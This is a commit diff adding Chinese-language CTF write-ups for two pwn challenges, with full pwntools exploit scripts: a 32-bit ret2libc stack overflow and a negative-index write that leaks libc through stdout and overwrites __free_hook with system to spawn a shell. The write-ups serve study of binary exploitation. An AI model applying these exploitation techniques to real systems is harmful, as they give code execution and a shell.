create(shanghai2025): submit wp

Author: RocketMaDev

shanghai2025/README.md

@@ -0,0 +1,8 @@
+# 上海磐石行动大学生CTF 2025
+
+今年没进决赛，遗憾离场了，初赛加复赛排名才22
+
+## 题解
+
+1. user
+2. account

shanghai2025/account.md

@@ -0,0 +1,72 @@
+# account
+
+## 文件属性
+
+|属性  |值    |
+|------|------|
+|Arch  |i386  |
+|RELRO|Partial|
+|Canary|off   |
+|NX    |on    |
+|PIE   |off   |
+|strip |no    |
+|libc  |2.31-0ubuntu9.18|
+
+## 解题思路
+
+非常直接的栈溢出，走ret2libc那套就行。不输入0就可以一直往上输入，
+输入时还会覆盖到`idx`，可以顺手将其改为指向返回地址，少循环几次，
+然后输入rop的链子后以0结尾就行。
+
+好久没做32位的题了，都忘记怎么构造rop了。32位上，发生了`call`以后，
+对于子函数来说，`[esp]`是返回地址，`[esp+4]`才是参数。因此我们在构造链子的时候，
+返回地址后面不应该跟参数，而是跟另一个返回地址，如下图所示。
+
+<img src="assets/32bit_rop.png" width="60%">
+
+> [!TIP]
+> `scanf("%d")`在输入超大数字时不会自动溢出到负数，因此需要我们手动干预，
+> 取数字的补码，例如对于libc这种超过`0x7fffffff`的指针，就要手动减去`1 << 32`
+
+## EXPLOIT
+
+```python
+from pwn import *
+context.terminal = ['tmux', 'splitw', '-h']
+def GOLD_TEXT(x): return f'\x1b[33m{x}\x1b[0m'
+EXE = './account'
+
+def payload(lo: int):
+    global t
+    if lo:
+        t = process(EXE)
+        if lo & 2:
+            gdb.attach(t, 'b *0x80492ea\nc')
+    else:
+        t = remote('pss.idss-cn.com', 24817)
+    elf = ELF(EXE)
+    libc = ELF('./libc.so.6')
+
+    def round_input(rop: list[int]):
+        bills = [1] * 10 # overflow
+        bills.append(13) # write i to ret addr
+        for e in rop:
+            bills.append(e if e < 0x80000000 else e - (1 << 32))
+        bills.append(0)  # ends up
+        t.sendlineafter(b'Enter', ' '.join(map(str, bills)).encode())
+        t.recvuntil(b'completed\n')
+
+    round_input([elf.plt['puts'], elf.symbols['vul'], elf.got['puts']])
+    libc_base = t.u32() - libc.symbols['puts']
+    success(GOLD_TEXT(f'Leak libc_base: {libc_base:#x}'))
+    libc.address = libc_base
+
+    round_input([libc.symbols['system'], libc.symbols['exit'],
+                 next(libc.search(b'/bin/sh')), 1])
+
+    t.clean()
+    t.interactive()
+    t.close()
+```
+
+![flag](assets/account_flag.png)

shanghai2025/assets/32bit_rop.png

@@ -0,0 +1,79 @@
+# user
+
+## 文件属性
+
+|属性  |值    |
+|------|------|
+|Arch  |amd64 |
+|RELRO |Full  |
+|Canary|on    |
+|NX    |on    |
+|PIE   |on    |
+|strip |no    |
+|libc  |2.31-0ubuntu9.18|
+
+## 解题思路
+
+看到`delete`和`edit`对输入的索引检查不严格，允许我们输入负数以向前访问。
+由于RELRO只读，因此我们有效的数据只有`stdin, stdout, stderr`和`__dso_handle`。
+使用`edit`，我们能够写`*stdout`的前0x40字节，通过修改`_flag`和`_IO_write_base`，
+就可以让`puts`先将base-ptr范围之间的内容输出出来，借此泄露libc。
+
+> [!TIP]
+> 网上一般说修改`_flag`为`0xfbad1800`，但是这样的话就不是无缓冲了，会影响脚本后续判断，
+> 因此根据原flag，我们可以设置为`0xfbad1887`，这样既能利用成功，又能保持原有的输出特性。
+
+不难注意到`__dso_handle`上放着`__dso_handle`自己，因此我们edit它时，
+等于原地修改那一片的内存。由于是libc2.31，可以直接写入一个`__free_hook`的地址，
+再edit它并写入`system`，就利用完毕了。最后分配一个堆块写入`/bin/sh`后，
+释放一下就能拿shell。
+
+## EXPLOIT
+
+```python
+from pwn import *
+context.terminal = ['tmux', 'splitw', '-h']
+context.arch = 'amd64'
+def GOLD_TEXT(x): return f'\x1b[33m{x}\x1b[0m'
+EXE = './user'
+
+def payload(lo: int):
+    global t
+    if lo:
+        t = process(EXE)
+        if lo & 2:
+            gdb.attach(t)
+    else:
+        t = remote('pss.idss-cn.com', 22122)
+    elf = ELF(EXE)
+    libc = elf.libc
+
+    def add(buf: bytes):
+        t.sendlineafter(b'Unregister', b'1')
+        t.sendafter(b'username:\n', buf)
+
+    def delete(idx: int):
+        t.sendlineafter(b'Unregister', b'2')
+        t.sendlineafter(b'index', str(idx).encode())
+
+    def edit(idx: int, buf: bytes):
+        t.sendlineafter(b'Unregister', b'4')
+        t.sendlineafter(b'index', str(idx).encode())
+        t.sendafter(b'username:\n', buf)
+
+    edit(-8, flat(0xfbad1887, 0, 0, 0, p8(0x8))) # set stdout->write_base to stdout->chain
+    libc_base = t.u64() - libc.symbols['_IO_2_1_stdin_']
+    success(GOLD_TEXT(f'Leak libc_base: {libc_base:#x}'))
+    libc.address = libc_base
+
+    add(b'/bin/sh')
+    edit(-11, p64(libc.symbols['__free_hook'])) # write free_hook on __dso_handle
+    edit(-11, p64(libc.symbols['system']))      # write system on free_hook
+    delete(0) # trigger free hook
+
+    t.clean()
+    t.interactive()
+    t.close()
+```
+
+![flag](assets/user_flag.png)